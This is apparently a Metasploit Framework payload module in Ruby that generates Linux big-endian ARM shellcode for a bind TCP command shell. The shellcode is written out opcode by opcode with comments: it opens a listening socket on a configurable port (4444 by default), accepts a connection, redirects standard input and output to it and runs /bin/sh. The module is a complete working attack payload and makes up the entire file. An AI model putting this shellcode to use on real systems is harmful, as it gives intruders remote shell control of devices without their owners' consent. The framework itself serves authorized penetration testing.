GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
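module MetasploitModule
  # Size of the payload produced with the default options: 110 bytes of
  # shellcode plus "/bin/sh" and its NUL terminator.
  CachedSize = 118

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata and its two options: CMD, the program run
  # once a client has connected, and LPORT, the port the shell listens on.
  #
  # @param info [Hash] module info merged over the defaults given here
  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'Linux ARM Big Endian Command Shell, Bind TCP Inline',
      'Description' => 'Listen for a connection and spawn a command shell',
      'Author'      => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
      'References'  => [['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s']],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_ARMBE,
      'Handler'     => Msf::Handler::BindTcp,
      'Session'     => Msf::Sessions::CommandShellUnix
    ))
    # Register command execution options
    register_options(
      [
        OptString.new('CMD', [true, 'The command to execute.', '/bin/sh']),
        Opt::LPORT(4444)
      ]
    )
  end

  # Assembles the big-endian Thumb shellcode: socket/bind/listen/accept,
  # dup2 of the accepted socket onto fds 0-2, execve of CMD, then exit.
  # The NUL-terminated CMD string is appended directly after the last
  # instruction and located by execve() relative to pc, so the `add r0, #18`
  # immediate in the execve block must be recomputed if any instruction after
  # `mov r0, pc` is added or removed.
  #
  # @param _opts [Hash] unused; kept for the Msf::Payload::Single interface
  # @return [String] raw payload bytes (ASCII-8BIT)
  def generate(_opts = {})
    # Force CMD to a binary string before the terminator is appended, so the
    # final concatenation with the ASCII-8BIT opcode literals below cannot
    # raise Encoding::CompatibilityError when CMD holds non-ASCII bytes.
    cmd = (datastore['CMD'] || '').b + "\x00"
    port = datastore['LPORT'].to_i
    # LPORT is patched into two `add r2, #imm8` immediates, high byte first.
    port_hi = (port >> 8).chr
    port_lo = (port & 0xFF).chr

    # turning on thumb mode
    "\xe2\x8f\x60\x01" + # add r6, pc, #1
    "\xe1\x2f\xff\x16" + # bx r6

    # thumb mode on
    # socket(2,1,0)
    "\x1a\x92" + # sub r2, r2, r2
    "\x1c\x51" + # add r1, r2, #1
    "\x1c\x90" + # add r0, r2, #2
    "\x02\x0f" + # lsl r7, r1, #8
    "\x37\x19" + # add r7, r7, #0x19
    "\xdf\x01" + # svc 1
    "\x1c\x06" + # mov r6, r0

    # bind()
    "\x22\x02" + # mov r2, #2
    "\x02\x12" + # lsl r2, r2, #8
    "\x32" + port_hi + # add r2, r2, #<LPORT high byte>
    "\x02\x12" + # lsl r2, r2, #8
    "\x32" + port_lo + # add r2, r2, #<LPORT low byte>
    "\x1a\xdb" + # sub r3, r3, r3
    "\x1b\x24" + # sub r4, r4, r4
    "\x1b\x6d" + # sub r5, r5, r5
    "\x46\x69" + # mov r1, sp
    "\xc1\x3c" + # stm r1!, {r2-r5}
    "\x39\x10" + # sub r1, #0x10
    "\x22\x10" + # mov r2, #16
    "\x37\x01" + # add r7, r7, #1
    "\xdf\x01" + # svc 1

    # listen()
    "\x1c\x30" + # mov r0, r6
    "\x1a\x49" + # sub r1, r1, r1
    "\x37\x02" + # add r7, r7, #2
    "\xdf\x01" + # svc 1

    # accept()
    "\x1c\x30" + # mov r0, r6
    "\x1a\x92" + # sub r2, r2, r2
    "\x37\x01" + # add r7, r7, #1
    "\xdf\x01" + # svc 1
    "\x1c\x06" + # mov r6, r0

    # dup2()
    "\x1a\x49" + # sub r1, r1, r1
    "\x27\x3f" + # mov r7, #63
    "\xdf\x01" + # svc 1
    "\x1c\x30" + # mov r0, r6
    "\x31\x01" + # add r1, r1, #1
    "\xdf\x01" + # svc 1
    "\x1c\x30" + # mov r0, r6
    "\x31\x01" + # add r1, r1, #1
    "\xdf\x01" + # svc 1

    # execve()
    "\x1a\x92" + # sub r2, r2, r2
    "\x46\x78" + # mov r0, pc
    "\x30\x12" + # add r0, #18
    "\x92\x02" + # str r2, [sp, #8]
    "\x90\x01" + # str r0, [sp, #4]
    "\xa9\x01" + # add r1, sp, #4
    "\x27\x0b" + # mov r7, #11
    "\xdf\x01" + # svc 1

    # exit()
    "\x1b\x24" + # sub r4, r4, r4
    "\x1c\x20" + # mov r0, r4
    "\x27\x01" + # mov r7, #1
    "\xdf\x01" + # svc 1
    cmd
  end
end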